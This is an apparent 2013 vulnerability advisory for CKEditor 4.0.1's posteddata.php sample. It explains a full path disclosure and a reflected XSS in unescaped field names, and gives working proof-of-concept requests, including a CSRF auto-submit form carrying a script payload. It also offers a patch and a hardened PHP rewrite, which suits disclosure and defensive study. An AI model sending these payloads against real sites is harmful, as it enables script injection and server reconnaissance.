ckeditor4.0.1_XSS_FPDisclosure

a guest
Feb 18th, 2013
===========================================
Vulnerable Software: ckeditor 4.0.1 standard
Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulns: Full Path Disclosure && XSS
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable Code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================

root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample &mdash; CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor &mdash; Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field&nbsp;Name</th>
<th>Value</th>
</tr>
</thead>
<?php

if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes( $value ) ) ;
else
$postedValue = htmlspecialchars( $value ) ;

?>
<tr>
<th style="vertical-align: top"><?php echo $sForm?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
</p>
<p id="copy">
Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>


=============SNIP ENDS HERE====================

Two sinks in the loop above: htmlspecialchars( $value ) is called on every POST value, but htmlspecialchars() only accepts strings, so a value that PHP has parsed into an array (any parameter named like name[]) makes it emit a warning that carries the script's absolute path; and the field name $sForm is echoed into the <th> cell with no escaping at all, so a POST key containing markup is rendered as HTML.



FULL Path Disclosure example:

URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: POST

HEADERS:

Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

POST DATA TO SEND:

bangbangbang[]=PATH DISCLOSURE

Result:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

The [] suffix makes PHP store the parameter as a one-element array, htmlspecialchars() rejects it with an E_WARNING, and because display_errors is on, the warning, absolute path included, is written into the response. Note that the request goes to sample_posteddata.php while the warning names assets/posteddata.php: the sample page hands the request off to the file shown above, which is where the loop runs.

Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png


=================================================

CSRF+XSS

The sample only renders POST data, so the reflected field name cannot be triggered with a plain link; instead the attacker hosts a page that auto-submits a form to the target, and the script in the field name executes in the origin of the site hosting CKEditor:

<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF">
</form>

=================================================

Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png



=================================================
And here is the fixed version: /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample &mdash; CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor &mdash; Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field&nbsp;Name</th>
<th>Value</th>
</tr>
</thead>
<?php

if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes( (string) $value ) ) ;
else
$postedValue = htmlspecialchars( (string) $value ) ;

?>
<tr>
<th style="vertical-align: top"><?php echo htmlspecialchars( (string) $sForm ); ?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
</p>
<p id="copy">
Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>
================SNIP ENDS HERE=======================

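Two things are worth knowing about the fix above before reusing it. The (string) cast stops the warning on the PHP 5.3 host the advisory was tested on, but from PHP 5.4 onward casting an array to a string raises an "Array to string conversion" notice (a warning in PHP 8), so with display_errors enabled the same absolute path leaks again, and the submitted array is shown as the word Array instead of its contents. What follows is an added example, not CKEditor's code and not the advisory author's, of a replacement for the loop that escapes both the field name (the XSS sink from the CSRF+XSS section) and the value, flattens nested parameters so htmlspecialchars() never receives an array (the trigger from the path-disclosure section), and keeps the magic-quotes handling for old PHP releases. The function names h, flattenPosted, stripMagicQuotes and renderRows and the sample input are this example's own. Whatever the code does, a sample page like this should not be deployed on a production host at all, and display_errors should be off there so that no other warning can leak paths either.

```php
<?php
// Added example, not CKEditor's own code: a hardened rewrite of the
// posted-data loop in samples/assets/posteddata.php. Field names and
// values are both escaped, and nested arrays (name[]=x, name[a][b]=y)
// are flattened instead of being handed to htmlspecialchars() as arrays,
// so neither the XSS nor the warning-based path disclosure is reachable.
// Function names (h, flattenPosted, stripMagicQuotes, renderRows) are
// this example's own, not names from the CKEditor package.

// Escape text for HTML body or attribute context. ENT_SUBSTITUTE
// (PHP >= 5.4) replaces invalid UTF-8 instead of returning an empty
// string; the defined() check keeps the code running on PHP 5.3.
function h($value)
{
    $flags = ENT_QUOTES | (defined('ENT_SUBSTITUTE') ? ENT_SUBSTITUTE : 0);
    return htmlspecialchars((string) $value, $flags, 'UTF-8');
}

// Undo magic_quotes_gpc recursively; only relevant on PHP < 5.4, where
// the feature (and get_magic_quotes_gpc()) still exists.
function stripMagicQuotes($value)
{
    if (is_array($value)) {
        return array_map('stripMagicQuotes', $value);
    }
    return stripslashes($value);
}

// Flatten a (possibly nested) POST value into "name[key][sub]" => scalar
// pairs. $depth caps recursion so hostile input cannot exhaust the stack
// (PHP itself stops parsing at max_input_nesting_level, 64 by default).
function flattenPosted($value, $name, array &$out, $depth = 0)
{
    if (!is_array($value)) {
        $out[$name] = $value;
        return;
    }
    if ($depth >= 64) {
        $out[$name . '[...]'] = '(nesting too deep, omitted)';
        return;
    }
    foreach ($value as $key => $child) {
        flattenPosted($child, $name . '[' . $key . ']', $out, $depth + 1);
    }
}

// Render the <tr> rows for an array shaped like $_POST; every key and
// value passes through h() before it reaches the markup.
function renderRows(array $post)
{
    $flat = array();
    foreach ($post as $field => $value) {
        flattenPosted($value, $field, $flat);
    }
    $html = '';
    foreach ($flat as $name => $value) {
        $html .= "<tr>\n"
               . '<th style="vertical-align: top">' . h($name) . "</th>\n"
               . '<td><pre class="samples">' . h($value) . "</pre></td>\n"
               . "</tr>\n";
    }
    return $html;
}

if (PHP_SAPI === 'cli') {
    // Constructed input mirroring the advisory's two requests: an array
    // parameter (the path-disclosure trigger) and a field name carrying
    // a script tag (the XSS payload). Run with: php posteddata-hardened.php
    $sample = array(
        'bangbangbang' => array('PATH DISCLOSURE'),
        "<script>alert('AkaStep');</script>" => 'SENDF',
        'editor1' => '<p>Hello <b>World</b></p>',
    );
    echo renderRows($sample);
} else {
    // Web context: render the live request, undoing magic quotes only
    // where that setting can still exist.
    $post = $_POST;
    if (PHP_VERSION_ID < 50400 && get_magic_quotes_gpc()) {
        $post = stripMagicQuotes($post);
    }
    echo renderRows($post);
}
```

Run from the command line it renders the constructed input: the array parameter appears as a row named bangbangbang[0] with its value intact instead of a warning, and the script tag in the second field name comes out entity-encoded (&lt;script&gt; ... &lt;/script&gt;) in the th cell, so the browser shows it as text. Pasted into the sample in place of the original loop, the else branch renders the live $_POST.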
=============ENJOYYY====================

KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
===========================================

/AkaStep